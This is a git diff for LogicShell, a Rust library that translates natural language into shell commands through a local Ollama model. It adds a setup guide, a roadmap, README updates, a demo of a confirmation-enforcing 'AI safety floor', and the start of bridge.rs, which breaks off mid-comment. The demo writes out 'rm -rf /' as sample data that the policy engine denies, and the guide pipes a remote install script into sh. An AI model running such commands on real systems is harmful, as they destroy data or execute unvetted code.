diff --git a/LLM_GUIDE.md b/LLM_GUIDE.md new file mode 100644 index 0000000..477211d --- /dev/null +++ b/LLM_GUIDE.md @@ -0,0 +1,298 @@ +# LLM Guide — Running Ollama with LogicShell + +This guide explains how to run a local Ollama daemon alongside LogicShell so that the LLM bridge (Phase 10) can translate natural language into shell commands and suggest corrections for failed commands. + +--- + +## Prerequisites + +| Tool | Version | Purpose | +|:-----|:--------|:--------| +| Ollama | any | Local LLM daemon | +| Rust toolchain | 1.75+ | Building LogicShell | +| llama3 (or another model) | any | Language model for inference | + +--- + +## 1. Install Ollama + +```bash +# Linux / macOS +curl -fsSL https://ollama.ai/install.sh | sh + +# Or via package manager (macOS) +brew install ollama +``` + +Verify installation: + +```bash +ollama --version +``` + +--- + +## 2. Start the Ollama Daemon + +```bash +ollama serve +``` + +The daemon listens on `http://127.0.0.1:11434` by default. To use a different address, set: + +```bash +OLLAMA_HOST=0.0.0.0:11434 ollama serve +``` + +Verify the daemon is running: + +```bash +curl http://127.0.0.1:11434/api/tags +# Expected: {"models":[...]} +``` + +--- + +## 3. Pull a Model + +```bash +# Pull llama3 (default model in LogicShell config) +ollama pull llama3 + +# Or a smaller/faster model +ollama pull mistral +ollama pull codellama +``` + +List available models: + +```bash +ollama list +``` + +--- + +## 4. Configure LogicShell + +Create or update `.logicshell.toml` in your project root: + +```toml +schema_version = 1 +safety_mode = "balanced" # strict | balanced | loose + +[llm] +enabled = true +provider = "ollama" +base_url = "http://127.0.0.1:11434" +model = "llama3" # must match a pulled model +timeout_secs = 60 +allow_remote = false + +[llm.invocation] +nl_session = true # enable natural-language mode +assist_on_not_found = true # suggest corrections on exit 127 +max_context_chars = 8000 # combined prompt cap +``` + +--- + +## 5. Build LogicShell with Ollama Support + +The `ollama` feature flag enables `OllamaLlmClient` (requires `reqwest`): + +```bash +# Build with Ollama HTTP client +cargo build --workspace --features ollama + +# Run tests (includes mockito-backed Ollama tests) +cargo test --workspace --features ollama + +# Run the Phase 10 demo (no live Ollama required — uses a stub client) +cargo run --example phase10 --package logicshell-llm + +# Run the Phase 9 demo (health probe + optional live inference) +cargo run --example phase9 --package logicshell-llm --features ollama +``` + +--- + +## 6. Using LlmBridge in Your Code + +### Natural-language to command (NL session mode) + +```rust +use std::sync::Arc; +use logicshell_core::config::{LlmConfig, SafetyConfig, SafetyMode}; +use logicshell_llm::{LlmBridge, apply_ai_safety_floor}; + +#[cfg(feature = "ollama")] +use logicshell_llm::ollama::OllamaLlmClient; + +#[tokio::main] +async fn main() { + #[cfg(feature = "ollama")] + { + let config = LlmConfig { + enabled: true, + model: Some("llama3".into()), + ..LlmConfig::default() + }; + + let client = Arc::new( + OllamaLlmClient::new(&config.base_url, config.model.as_deref().unwrap(), config.timeout_secs) + ); + + let bridge = LlmBridge::from_config(client, &config).expect("bridge config valid"); + + // Translate natural language to a command + match bridge.translate_nl("list all rust files recursively").await { + Ok(proposed) => { + // AI-generated commands always return at least Decision::Confirm + let (assessment, decision) = proposed.evaluate_safety( + SafetyMode::Balanced, + &SafetyConfig::default(), + ); + println!("Suggested: {:?}", proposed.argv); + println!("Safety: {decision:?} (score: {})", assessment.score); + println!("Raw response: {:?}", proposed.raw_response); + // Dispatch only after user confirms... + } + Err(e) => eprintln!("LLM error (falling back to manual): {e}"), + } + } +} +``` + +### Assist-on-127 (correction mode) + +```rust +// When a command returns exit code 127 (not found), ask the LLM for a correction +match bridge.assist_on_127(&["gti", "status"]).await { + Ok(proposed) => { + println!("Did you mean: {:?}", proposed.argv); + // Ask user to confirm before dispatching + } + Err(e) => eprintln!("Suggestion unavailable: {e}"), +} +``` + +### Health probe (check before using) + +```rust +#[cfg(feature = "ollama")] +{ + use logicshell_llm::ollama::{HealthStatus, OllamaLlmClient}; + + let client = OllamaLlmClient::new("http://127.0.0.1:11434", "llama3", 10); + match client.health_probe().await { + Ok(HealthStatus::Healthy) => println!("Ready"), + Ok(HealthStatus::ModelMissing) => println!("Run: ollama pull llama3"), + Ok(HealthStatus::UnexpectedStatus(n)) => println!("Daemon error: HTTP {n}"), + Err(e) => println!("Daemon unreachable: {e}"), + } +} +``` + +--- + +## 7. AI Safety Floor + +All commands produced by `LlmBridge` have `source: CommandSource::AiGenerated`. When evaluated through `ProposedCommand::evaluate_safety`, the safety floor is applied: + +| Base Decision | After AI Floor | +|:-------------|:--------------| +| `Allow` | `Confirm` | +| `Confirm` | `Confirm` | +| `Deny` | `Deny` | + +This means **AI-generated commands always require explicit user confirmation** — they are never silently dispatched, regardless of the safety mode. + +```rust +use logicshell_llm::{apply_ai_safety_floor, CommandSource}; +use logicshell_core::Decision; + +// Floor function can be applied standalone +let decision = apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated); +assert_eq!(decision, Decision::Confirm); +``` + +--- + +## 8. Graceful Degradation + +If Ollama is not running, `LlmBridge` returns `LlmError::Http`. Your application should fall back gracefully: + +```rust +match bridge.translate_nl("show disk usage").await { + Ok(proposed) => { /* use the proposed command */ } + Err(logicshell_llm::LlmError::Http(msg)) => { + eprintln!("LLM unavailable ({msg}), please enter command manually"); + // Fall back to manual input + } + Err(e) => eprintln!("Unexpected error: {e}"), +} +``` + +--- + +## 9. Running the Live Tests + +Tests that require a running Ollama daemon are tagged `#[ignore]`: + +```bash +# Run live Ollama tests (requires: ollama serve + ollama pull llama3) +cargo test --package logicshell-llm --features ollama -- --ignored + +# Run all tests including live +cargo test --workspace --features ollama -- --include-ignored +``` + +--- + +## 10. Troubleshooting + +| Problem | Solution | +|:--------|:---------| +| `LlmError::Http("connection refused")` | Start Ollama: `ollama serve` | +| `HealthStatus::ModelMissing` | Pull the model: `ollama pull llama3` | +| Slow responses | Increase `timeout_secs` in `[llm]` config | +| Wrong command suggestions | Try a larger model: `ollama pull llama3:70b` | +| Response not parsed | LLM returned explanation text — check `raw_response` and file an issue | +| `LlmError::ContextTooLarge` | Increase `max_context_chars` or shorten the NL input | + +--- + +## 11. Supported Models + +Any model available via `ollama pull` works. Recommended models for command generation: + +| Model | Size | Notes | +|:------|:-----|:------| +| `llama3` | 4.7 GB | Good balance of speed and accuracy | +| `codellama` | 3.8 GB | Optimized for code/shell commands | +| `mistral` | 4.1 GB | Fast and capable | +| `llama3:70b` | 39 GB | Highest accuracy, requires GPU | +| `phi3` | 2.3 GB | Lightweight, good on CPU | + +--- + +## 12. Configuration Reference + +```toml +[llm] +enabled = true # master switch (default: false) +provider = "ollama" # only supported provider in M3 +base_url = "http://127.0.0.1:11434" # Ollama daemon URL +model = "llama3" # model name (required when enabled) +timeout_secs = 60 # per-request HTTP timeout +allow_remote = false # must be false (MVP: local only) + +[llm.invocation] +nl_session = false # enable NL session mode +assist_on_not_found = false # suggest on exit 127 +max_context_chars = 8000 # combined prompt character cap +``` + +--- + +See [README.md](README.md) for the full project documentation and [CONTRIBUTING.md](CONTRIBUTING.md) for the TDD workflow. diff --git a/PLAN.md b/PLAN.md new file mode 100644 index 0000000..386008a --- /dev/null +++ b/PLAN.md @@ -0,0 +1,217 @@ +# LogicShell — Implementation Plan + +## Completed Milestones + +### M1 — Core Dispatcher + Config (Phases 1–5) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 1 | Workspace bootstrap, CI skeleton | ✅ | +| 2 | `LogicShellError` enum, project structure | ✅ | +| 3 | Config schema (`Config`, `LlmConfig`, etc.) | ✅ | +| 4 | Config discovery (env var, walk-up, XDG) | ✅ | +| 5 | Async `ProcessDispatcher` (tokio::process, stdout cap) | ✅ | + +### M2 — Safety, Audit, Hooks (Phases 6–7) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 6 | `AuditSink` (NDJSON, O_APPEND), `HookRunner`, `LogicShell` façade | ✅ | +| 7 | `SafetyPolicyEngine` (strict/balanced/loose, deny/allow lists, regexes) | ✅ | + +### M3 — LLM Bridge + Ollama (Phases 8–10) ✅ + +| Phase | Feature | Status | +|:------|:--------|:-------| +| 8 | `SystemContextProvider`, `PromptComposer`, `LlmClient` trait | ✅ | +| 9 | `OllamaLlmClient` (reqwest, health probe, mockito tests) | ✅ | +| 10 | `LlmBridge`, `ProposedCommand`, `CommandSource`, parser, AI safety floor | ✅ | + +**Current state:** 506 tests · 96%+ coverage · clippy clean · `cargo fmt` clean + +--- + +## M4 — Ratatui TUI (Phases 11–14) + +### Phase 11 — TUI foundation + +**Goal:** Introduce an interactive terminal UI shell powered by [Ratatui](https://ratatui.rs/) that wraps the `LogicShell` façade. The TUI is a thin presentation layer — all business logic stays in `logicshell-core` and `logicshell-llm`. + +**Deliverables:** +- New crate `logicshell-tui` in the workspace. +- `App` struct: terminal state machine with `Running` / `Quitting` lifecycle. +- Raw-mode terminal setup / teardown via `crossterm`. +- Minimal event loop: keyboard input (`Ctrl-C` / `q` to quit, `Enter` to submit). +- Configurable prompt widget showing current working directory. +- Static "welcome" layout with status bar (phase, version, safety mode). +- Unit-testable event dispatch without a real terminal (mock backend). + +**Tests:** App state machine, event routing, layout rendering to buffer. + +--- + +### Phase 12 — Command input + history + +**Goal:** Full-featured input line with readline-like editing and session history. + +**Deliverables:** +- `InputWidget` with cursor tracking, character insert/delete, Home/End. +- Arrow-key history navigation (in-memory `VecDeque`). +- Ctrl-A (beginning of line), Ctrl-E (end), Ctrl-K (kill to end). +- History persistence to `~/.local/share/logicshell/history` (one command per line, 1 000 entry cap). +- `HistoryStore` abstraction (sync, pure) — testable without the TUI. + +**Tests:** InputWidget cursor math, history ring-buffer, persistence round-trip. + +--- + +### Phase 13 — TUI dispatch + output panel + +**Goal:** Wire the TUI input to `LogicShell::dispatch` and display stdout/stderr in a scrollable panel. + +**Deliverables:** +- `OutputPanel` widget with ring buffer (configurable line cap, default 500). +- Dispatch stdout streamed line-by-line into the panel (no full capture in memory). +- Safety confirm dialog: when `Decision::Confirm`, show a modal overlay asking `[y/N]` before dispatching. +- Deny banner: red status bar when a command is blocked. +- Async dispatch on a separate Tokio task; TUI remains responsive during execution. +- Exit code / duration shown in the status bar after each command. + +**Tests:** OutputPanel scroll math, confirm dialog state, deny-banner render, dispatch-task cancellation. + +--- + +### Phase 14 — NL mode in TUI + LLM status widget + +**Goal:** Surface the Phase 10 `LlmBridge` inside the TUI with a first-class UX for AI-assisted command entry. + +**Deliverables:** +- Toggle NL mode with `Ctrl-L`; indicator in status bar (`NL` badge). +- In NL mode, input is sent to `LlmBridge::translate_nl` instead of directly dispatched. +- `LlmStatusWidget`: spinner during inference, health-probe result on startup. +- Proposed command shown in a preview pane before the confirm dialog. +- Keyboard shortcut `Ctrl-E` to edit the proposed command before confirming. +- Graceful degradation: if Ollama is down, fall back to direct dispatch with a warning. + +**Tests:** NL mode toggle, preview rendering, edit-before-confirm workflow, degradation path. + +--- + +## M5 — Remote LLM Providers (Phases 15–17) + +### Phase 15 — Provider abstraction + +**Goal:** Refactor `LlmClient` into a provider-agnostic interface with runtime selection. + +**Deliverables:** +- `LlmProvider` enum extended: `Ollama`, `OpenAi`, `Anthropic`. +- `LlmClientFactory::build(config: &LlmConfig) -> Box` — dyn-compatible via `BoxFuture` wrapper. +- `allow_remote = true` validation: must be explicitly opted in; rejected in MVP paths. +- Provider selection stored in `Config` and surfaced in the TUI status bar. +- Feature flags: `openai` (reqwest + JSON), `anthropic` (reqwest + streaming SSE). + +**Tests:** Factory routing, allow_remote guard, feature-flag compile-time gating. + +--- + +### Phase 16 — OpenAI-compatible client + +**Goal:** Implement an `OpenAiLlmClient` targeting the OpenAI Chat Completions API. + +**Deliverables:** +- `POST /v1/chat/completions` with `{"model","messages":[{role,content}],"stream":false}`. +- API key from `OPENAI_API_KEY` env var; never in config file. +- Response: extract `choices[0].message.content`. +- Retry logic: exponential back-off on 429 (rate limit), up to 3 retries. +- Mockito test suite for happy path, 429 retry, 401 auth error. +- Live smoke test tagged `#[ignore]`. + +**Tests:** Wire-type deserialization, retry state machine, auth error propagation. + +--- + +### Phase 17 — Anthropic Claude client + +**Goal:** Implement an `AnthropicLlmClient` targeting the Messages API with prompt caching. + +**Deliverables:** +- `POST /v1/messages` with system prompt (OS context) as a `cache_control: ephemeral` block. +- Response: extract `content[0].text`. +- `cache_read_input_tokens` / `cache_creation_input_tokens` logged at TRACE level. +- `ANTHROPIC_API_KEY` env var; `anthropic-version` header pinned. +- Streaming disabled in MVP; non-streaming response only. +- Mockito suite + live `#[ignore]` test. + +**Tests:** Cache header sent, response extraction, cache metrics logged. + +--- + +## M6 — Plugin System (Phases 18–20) + +### Phase 18 — Plugin trait + loader + +**Goal:** Allow third-party Rust crates (or WASM modules) to extend the dispatch pipeline with custom pre/post hooks and safety rules. + +**Deliverables:** +- `LogicShellPlugin` trait: `fn name(&self) -> &str`, `fn on_pre_dispatch(&self, argv: &[&str]) -> PluginDecision`, `fn on_post_dispatch(&self, argv: &[&str], exit: i32)`. +- `PluginRegistry`: runtime list of boxed plugins, iterated in registration order. +- `LogicShell::register_plugin(plugin: Box)`. +- Native plugin loading from a shared library via `libloading` (optional `plugin-native` feature). +- `PluginDecision::Allow | Deny(reason) | Passthrough`. + +**Tests:** Registry ordering, deny short-circuits dispatch, multiple plugin composition. + +--- + +### Phase 19 — WASM plugin sandbox + +**Goal:** Load plugins compiled to WebAssembly for cross-platform, sandboxed extensibility. + +**Deliverables:** +- `wasmtime`-backed `WasmPluginLoader` behind the `plugin-wasm` feature. +- ABI: plugins export `on_pre_dispatch(argv_json_ptr, len) -> i32` (0 = allow, 1 = deny). +- Resource limits: max memory 4 MiB, max execution time 50 ms (via `wasmtime::Limits`). +- `PluginManifest` (TOML): name, path, permissions, version. +- Sandbox escape prevention: no host filesystem or network access by default. + +**Tests:** ABI call, memory limit enforcement, timeout kill, manifest parsing. + +--- + +### Phase 20 — Plugin marketplace + CLI + +**Goal:** `logicshell-cli` binary with `plugin` subcommands for discovering and managing plugins. + +**Deliverables:** +- New crate `logicshell-cli` with `clap`-powered CLI. +- `logicshell plugin list` — show registered plugins and their versions. +- `logicshell plugin install ` — validate, copy, update config. +- `logicshell plugin remove ` — remove from config and filesystem. +- `logicshell plugin test ` — smoke-test a plugin against a configurable argv. +- Plugin directory: `$XDG_DATA_HOME/logicshell/plugins/`. +- Plugin signature verification (SHA-256 hash in manifest). + +**Tests:** CLI argument parsing, install/remove round-trip, signature check, path validation. + +--- + +## Coverage & Quality Gates (all milestones) + +| Check | Requirement | +|:------|:------------| +| `cargo fmt --check` | No diff | +| `cargo clippy --workspace --all-features -- -D warnings` | Zero warnings | +| `cargo test --workspace` | All pass, 0 ignored (except live-daemon tests) | +| `cargo tarpaulin --workspace` | ≥ 90% line coverage | +| `cargo build --workspace` | Zero warnings | + +--- + +## Architecture Principles + +1. **Library-first**: all user-facing features live in crates (`logicshell-core`, `logicshell-llm`, `logicshell-tui`). CLIs and TUIs are thin shells over library APIs. +2. **No LLM in hot paths**: `SafetyPolicyEngine` and `PromptComposer` are sync and pure — no async in critical policy paths (NFR-05). +3. **AI-generated commands always need confirmation**: `ProposedCommand::evaluate_safety` applies the AI safety floor regardless of safety mode. +4. **Feature flags**: `ollama`, `openai`, `anthropic`, `plugin-native`, `plugin-wasm` — pull in heavy dependencies only when needed. +5. **Zero real network in `cargo test`**: all HTTP-backed tests use mockito or mockall; live tests are `#[ignore]`. +6. **TDD discipline**: write the test first, make it pass, then refactor (red → green → clean). diff --git a/README.md b/README.md index 7eee577..2fdbbe4 100644 --- a/README.md +++ b/README.md @@ -21,7 +21,7 @@ LogicShell is a **library-first** Rust framework that sits between a host applic - **Append-only audit log** — every dispatch writes a NDJSON record (timestamp, cwd, argv, safety decision, optional note) that survives process restarts. - **Configuration discovery** — TOML config file resolved via `LOGICSHELL_CONFIG`, project walk-up, XDG, or built-in defaults, with strict unknown-key rejection. - **Safety policy engine** — `strict` / `balanced` / `loose` modes with deny/allow prefix lists, high-risk regex patterns, sudo heuristics, and a four-category risk taxonomy (destructive filesystem, privilege elevation, network, package). -- **Local LLM bridge** _(Phases 8–10, planned)_ — Ollama-backed natural-language-to-command translation, gated behind safety policy and explicit user confirmation. +- **Local LLM bridge** _(Phases 8–10)_ — Ollama-backed natural-language-to-command translation, gated behind safety policy and explicit user confirmation. AI-generated commands always require confirmation before dispatch. LogicShell is **not** a POSIX shell replacement. It is an embeddable dispatcher + policy + optional-AI stack that host applications link as a crate. @@ -33,11 +33,12 @@ LogicShell is **not** a POSIX shell replacement. It is an embeddable dispatcher |:----------|:-------|:-------| | **M1** — Dispatcher, config, CI | 1–5 | ✅ Complete | | **M2** — Safety engine, audit, hooks | 6–7 | ✅ Complete | -| **M3** — LLM bridge, Ollama | 8–10 | 📋 Planned | -| **M4** — Ratatui TUI | — | 📋 Planned | -| **M5** — Remote LLM providers | — | 📋 Planned | +| **M3** — LLM bridge, Ollama | 8–10 | ✅ Complete | +| **M4** — Ratatui TUI | 11–14 | 📋 Planned | +| **M5** — Remote LLM providers | 15–17 | 📋 Planned | +| **M6** — Plugin system | 18–20 | 📋 Planned | -**Current:** 294 tests · **98%+ line coverage** · `cargo clippy -D warnings` clean +**Current:** 506 tests · **96%+ line coverage** · `cargo clippy -D warnings` clean --- @@ -304,9 +305,9 @@ command = ["slack-notify", "deploying to prod"] timeout_ms = 3000 ``` -### 2. AI-assisted terminal (planned — Phase 8+) +### 2. AI-assisted terminal (Phase 10) -Enable `llm.invocation.assist_on_not_found = true` to have LogicShell query a local Ollama model when a command returns exit code 127. The suggested correction is presented for confirmation before running — never auto-executed. +Enable `llm.invocation.assist_on_not_found = true` to have LogicShell query a local Ollama model when a command returns exit code 127. The suggested correction is presented for confirmation before running — never auto-executed. AI-generated commands always receive a raised safety floor (`Allow` → `Confirm`). ```toml [llm] @@ -328,25 +329,28 @@ Run arbitrary scripts before every dispatch — health checks, secret injection, ## Next steps (roadmap) -### Phase 8 — LLM context + prompt composer +### ✅ Phase 8 — LLM context + prompt composer - `SystemContextProvider` — reads OS family, architecture, abbreviated PATH, cwd. - `PromptComposer` — pure, sync, templates via `include_str!`, enforces `max_context_chars`. - `LlmClient` async trait + `LlmRequest` / `LlmResponse` types. -- Build without the `ollama` feature; no HTTP deps in `logicshell-core`. -### Phase 9 — OllamaLlmClient +### ✅ Phase 9 — OllamaLlmClient - `OllamaLlmClient` behind the `ollama` feature flag using `reqwest`. - Health probe (`GET /api/tags`) with graceful degradation matrix. - Full mockito test suite; zero real network in default `cargo test`. -### Phase 10 — LlmBridge + AI-safety integration +### ✅ Phase 10 — LlmBridge + AI-safety integration -- `LlmBridge` orchestrates context → composer → client → parser → safety. -- `ProposedCommand` with `source: CommandSource::AiGenerated` raises the risk floor. -- NL session mode, argv-only mode, and assist-on-127 mode. -- Graceful degradation when Ollama is unreachable. +- `LlmBridge` generic orchestrator: context → composer → client → parser → `ProposedCommand`. +- `ProposedCommand` with `source: CommandSource::AiGenerated` raises the risk floor (`Allow` → `Confirm`). +- `parser::parse_command_response` — strips code fences, POSIX shell tokenizer. +- NL session mode (`translate_nl`) and assist-on-127 mode. +- Graceful degradation: `LlmError::Http` propagated for caller fallback. +- 96%+ coverage; 506 tests total. + +See [LLM_GUIDE.md](LLM_GUIDE.md) for running Ollama alongside LogicShell. --- @@ -389,15 +393,30 @@ logicshell/ │ │ ├── hooks_audit_integration.rs │ │ └── e2e.rs # Full-stack end-to-end tests │ └── examples/ -│ └── demo.rs # Runnable feature demonstration +│ └── demo.rs # Runnable feature demonstration (Phases 3–7) ├── logicshell-llm/ # LLM bridge (Phases 8–10) -├── docs/ -│ ├── PLAN.md -│ ├── ARCHITECTURE.md -│ ├── TESTING_STRATEGY.md -│ ├── LOGICSHELL_OPERATIONS.md -│ ├── LogicShell Framework PRD.md -│ └── LogicShell LLM Module PRD.md +│ ├── src/ +│ │ ├── lib.rs # Re-exports for all public types +│ │ ├── client.rs # LlmClient trait + LlmRequest/LlmResponse (Phase 8) +│ │ ├── context.rs # SystemContextProvider + snapshot (Phase 8) +│ │ ├── prompt.rs # PromptComposer + templates (Phase 8) +│ │ ├── error.rs # LlmError enum +│ │ ├── ollama.rs # OllamaLlmClient (Phase 9, `ollama` feature) +│ │ ├── parser.rs # LLM response → argv tokenizer (Phase 10) +│ │ ├── proposed.rs # ProposedCommand + CommandSource + safety floor (Phase 10) +│ │ ├── bridge.rs # LlmBridge orchestrator (Phase 10) +│ │ └── templates/ +│ │ ├── nl_to_command.txt +│ │ └── assist_on_127.txt +│ ├── tests/ +│ │ ├── phase8_integration.rs +│ │ ├── phase9_integration.rs # (requires `ollama` feature) +│ │ └── phase10_integration.rs +│ └── examples/ +│ ├── phase8.rs # Phase 8 demo +│ ├── phase9.rs # Phase 9 demo (requires `ollama` feature) +│ └── phase10.rs # Phase 10 demo +├── LLM_GUIDE.md # Running Ollama + LogicShell together ├── tarpaulin.toml # Coverage config (gate: ≥ 90%) ├── rust-toolchain.toml # Pinned stable channel └── Cargo.toml # Workspace root diff --git a/logicshell-llm/examples/phase10.rs b/logicshell-llm/examples/phase10.rs new file mode 100644 index 0000000..384ad3f --- /dev/null +++ b/logicshell-llm/examples/phase10.rs @@ -0,0 +1,204 @@ +// Phase 10 demo: LlmBridge + AI-safety integration +// +// Shows the full pipeline: +// NL input → LlmBridge → ProposedCommand → safety evaluation → dispatch +// +// Usage (no Ollama required — uses an inline stub client): +// cargo run --example phase10 --package logicshell-llm +// +// With a live Ollama daemon: +// cargo run --example phase10 --package logicshell-llm --features ollama + +use std::sync::Arc; + +use logicshell_core::{ + config::{LlmConfig, SafetyConfig, SafetyMode}, + Decision, +}; +use logicshell_llm::{ + apply_ai_safety_floor, CommandSource, LlmBridge, LlmClient, LlmError, LlmRequest, LlmResponse, + ProposedCommand, +}; + +// ── Stub client used when Ollama is not running ─────────────────────────────── + +#[derive(Debug)] +struct StubClient { + fixed_response: String, +} + +impl StubClient { + fn new(response: impl Into) -> Arc { + Arc::new(Self { + fixed_response: response.into(), + }) + } +} + +impl LlmClient for StubClient { + async fn complete(&self, req: LlmRequest) -> Result { + Ok(LlmResponse { + text: self.fixed_response.clone(), + model: req.model, + }) + } +} + +#[tokio::main] +async fn main() { + println!("[Phase 10: LlmBridge construction]"); + + let bridge = LlmBridge::new(StubClient::new("ls -la"), "llama3", 8_000); + assert_eq!(bridge.model(), "llama3"); + println!(" model = {:?}", bridge.model()); + + // from_config — disabled LLM + let disabled_cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let err = LlmBridge::from_config(StubClient::new("ls"), &disabled_cfg).unwrap_err(); + println!(" disabled LLM returns: {err}"); + assert!(err.to_string().contains("disabled")); + println!(" construction assertions OK"); + + println!("[Phase 10: translate_nl — NL session mode]"); + + let bridge = LlmBridge::new(StubClient::new("ls -lhS"), "llama3", 8_000); + let proposed = bridge + .translate_nl("list files sorted by size") + .await + .expect("translate_nl failed"); + + assert_eq!(proposed.source, CommandSource::AiGenerated); + assert_eq!(proposed.argv[0], "ls"); + println!(" nl_input = \"list files sorted by size\""); + println!(" argv = {:?}", proposed.argv); + println!(" source = {:?}", proposed.source); + println!(" raw = {:?}", proposed.raw_response); + println!(" translate_nl OK"); + + println!("[Phase 10: assist_on_127 — typo correction mode]"); + + let bridge = LlmBridge::new(StubClient::new("git status"), "llama3", 8_000); + let proposed127 = bridge + .assist_on_127(&["gti", "status"]) + .await + .expect("assist_on_127 failed"); + + assert_eq!(proposed127.argv, vec!["git", "status"]); + assert_eq!(proposed127.source, CommandSource::AiGenerated); + println!(" failed_argv = [\"gti\", \"status\"]"); + println!(" suggested = {:?}", proposed127.argv); + println!(" assist_on_127 OK"); + + println!("[Phase 10: graceful degradation — unreachable daemon]"); + + #[derive(Debug)] + struct DownClient; + impl LlmClient for DownClient { + async fn complete(&self, _: LlmRequest) -> Result { + Err(LlmError::Http("connection refused".into())) + } + } + + let bridge_down = LlmBridge::new(Arc::new(DownClient), "llama3", 8_000); + match bridge_down.translate_nl("do something").await { + Err(LlmError::Http(msg)) => { + println!(" daemon down → graceful Http error: {msg}"); + } + other => panic!("expected Http error, got: {other:?}"), + } + println!(" graceful degradation OK"); + + println!("[Phase 10: AI safety floor — ProposedCommand raises risk]"); + + // Safe command (ls) is normally Allow, but AI raises it to Confirm. + let safe_proposed = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + let (assessment, decision) = + safe_proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + println!(" command = {:?}", safe_proposed.argv); + println!(" risk_score = {}", assessment.score); + println!(" decision = {decision:?} (Allow raised to Confirm by AI floor)"); + assert_eq!( + decision, + Decision::Confirm, + "safe AI command must require user confirmation" + ); + + // Dangerous command stays Deny regardless. + let dangerous_proposed = ProposedCommand::new( + vec!["rm".into(), "-rf".into(), "/".into()], + CommandSource::AiGenerated, + "rm -rf /", + ); + let (_, deny_decision) = + dangerous_proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + println!(" rm -rf / → decision = {deny_decision:?}"); + assert_eq!(deny_decision, Decision::Deny); + println!(" safety floor assertions OK"); + + println!("[Phase 10: apply_ai_safety_floor standalone]"); + assert_eq!( + apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated), + Decision::Confirm + ); + assert_eq!( + apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated), + Decision::Confirm + ); + assert_eq!( + apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated), + Decision::Deny + ); + println!(" Allow → Confirm, Confirm → Confirm, Deny → Deny OK"); + + println!("[Phase 10: code-fence stripping in response]"); + + let bridge_fence = LlmBridge::new( + StubClient::new("```bash\nfind /tmp -name '*.log'\n```"), + "llama3", + 8_000, + ); + let fenced = bridge_fence + .translate_nl("find log files in tmp") + .await + .unwrap(); + println!(" argv = {:?}", fenced.argv); + assert_eq!(fenced.argv[0], "find"); + println!(" code-fence stripping OK"); + + // ── Optional: OllamaLlmClient path ─────────────────────────────────────── + + #[cfg(feature = "ollama")] + { + println!("[Phase 10: OllamaLlmClient bridge — health probe]"); + use logicshell_llm::ollama::{HealthStatus, OllamaLlmClient}; + + const BASE_URL: &str = "http://127.0.0.1:11434"; + const MODEL: &str = "llama3"; + + let ollama = Arc::new(OllamaLlmClient::new(BASE_URL, MODEL, 30)); + match ollama.health_probe().await { + Ok(HealthStatus::Healthy) => { + println!(" Ollama healthy — running live translate_nl"); + let bridge = LlmBridge::new(ollama, MODEL, 8_000); + match bridge + .translate_nl("list files in the current directory") + .await + { + Ok(p) => println!(" live response: {:?}", p.argv), + Err(e) => println!(" generate error (graceful): {e}"), + } + } + Ok(s) => println!(" Ollama not ready ({s:?}) — skipping live call"), + Err(e) => println!(" Ollama unreachable: {e} — skipping live call"), + } + } + + println!("\n✓ Phase 10 features verified OK"); +} diff --git a/logicshell-llm/src/bridge.rs b/logicshell-llm/src/bridge.rs new file mode 100644 index 0000000..bfd29b5 --- /dev/null +++ b/logicshell-llm/src/bridge.rs @@ -0,0 +1,326 @@ +// LlmBridge — Phase 10, LLM Module PRD §5.7 +// +// Orchestrates: SystemContextProvider → PromptComposer → LlmClient → parser +// → ProposedCommand. +// +// Three operational modes (FR-25, FR-26, FR-27): +// - `translate_nl` — natural-language session mode +// - `assist_on_127` — suggest a fix when a command returns exit 127 +// +// Graceful degradation (FR-24): any `LlmError::Http` from the client is +// propagated unchanged so callers can fall back to the non-AI path without +// panicking. +// +// The bridge is independent of the `ollama` feature; callers inject any +// `Arc` implementation. + +use std::sync::Arc; + +use logicshell_core::config::LlmConfig; + +use crate::{ + client::LlmClient, + context::SystemContextProvider, + error::LlmError, + parser::parse_command_response, + prompt::PromptComposer, + proposed::{CommandSource, ProposedCommand}, +}; + +/// Orchestrates the full LLM-to-command pipeline. +/// +/// Generic over the client type `C` (must implement [`LlmClient`]) so that +/// production code uses the concrete `OllamaLlmClient` and tests inject a +/// `MockLlmClient` — no `dyn` trait objects needed (async traits are not +/// dyn-compatible without boxing). +/// +/// Construct with [`LlmBridge::new`] (direct) or [`LlmBridge::from_config`] +/// (from a validated [`LlmConfig`]). All methods are `async` because +/// inference is I/O-bound (NFR-05). +#[derive(Debug)] +pub struct LlmBridge { + composer: PromptComposer, + client: Arc, + context_provider: SystemContextProvider, +} + +impl LlmBridge { + /// Construct a bridge directly with a model name and context cap. + /// + /// Use [`LlmBridge::from_config`] when a validated [`LlmConfig`] is + /// available; use this constructor in tests or when the config is not + /// available. + pub fn new(client: Arc, model: impl Into, max_context_chars: usize) -> Self { + Self { + composer: PromptComposer::new(model, max_context_chars), + client, + context_provider: SystemContextProvider::new(), + } + } + + /// Construct a bridge from an [`LlmConfig`], returning errors for disabled + /// or misconfigured LLM settings. + pub fn from_config(client: Arc, config: &LlmConfig) -> Result { + let composer = PromptComposer::from_config(config)?; + Ok(Self { + composer, + client, + context_provider: SystemContextProvider::new(), + }) + } + + /// The model name this bridge sends in every request. + pub fn model(&self) -> &str { + self.composer.model() + } + + /// Translate a natural-language description into a [`ProposedCommand`]. + /// + /// Pipeline: snapshot → compose_nl_to_command → complete → parse. + /// + /// # Errors + /// + /// - `LlmError::ContextTooLarge` if the rendered prompt exceeds the cap. + /// - `LlmError::Http` if the daemon is unreachable (graceful degradation). + /// - `LlmError::Parse` if the model response cannot be tokenized. + pub async fn translate_nl(&self, nl_input: &str) -> Result { + let snap = self.context_provider.snapshot(); + let req = self.composer.compose_nl_to_command(nl_input, &snap)?; + let resp = self.client.complete(req).await?; + let argv = parse_command_response(&resp.text)?; + Ok(ProposedCommand::new( + argv, + CommandSource::AiGenerated, + resp.text, + )) + } + + /// Suggest a corrected command when the original returned exit code 127. + /// + /// Pipeline: snapshot → compose_assist_on_127 → complete → parse. + /// + /// # Errors + /// + /// Same as 